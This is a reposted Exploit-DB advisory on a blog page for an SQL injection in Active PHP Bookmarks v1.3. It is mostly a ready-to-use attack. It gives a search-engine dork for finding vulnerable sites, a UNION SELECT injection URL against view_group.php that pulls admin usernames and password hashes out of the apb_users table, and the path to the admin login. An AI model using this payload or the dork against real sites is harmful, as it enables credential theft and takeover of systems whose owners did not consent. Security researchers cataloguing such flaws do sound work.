0

Active PHP Bookmarks v1.3 SQL Injection Vulnerability

Tuesday, 22 December 2009 Unknown
Share this Article on :
# Title: Active PHP Bookmarks v1.3 SQL Injection Vulnerability
# EDB-ID: 10597
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.Elgaarh
# Published: 2009-12-22
# Verified: yes
# Download
  • Exploit Code

    • # Download N/A

    view source
    print?
    # Title: Active PHP Bookmarks v1.3 Remote SQL Injection Vulnerability
    # EDB-ID: ()
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Mr.Elgaarh
    # Published: 2009-12-21
    =============================================================
    ~ Author : Mr.Elgaarh
    ~ Email : scan_cmpu@yahoo.com
    ~ Home : http://securityreason.com/
    =============================================================

    Dork : "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id=

    ./Exploit:

    first search for the admin username :
    ex : http://server/path/view_group.php?id=-4

    ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--

    admin panel path : http://server/path/cookie_auth.php?action=cookie_login

    ---------------------------------------------------------------------------------------------------------------------------
    Greets : Mado - Dr.Hacker - Mr.Max - broken proxy - Offensive Security - AG-Spider - ISlamic Defenders Crew -




    Artikel Terkait:

    Posted at 13:47
    Labels:

    0 comments:

    Post a Comment

    Subscribe to: Post Comments (Atom)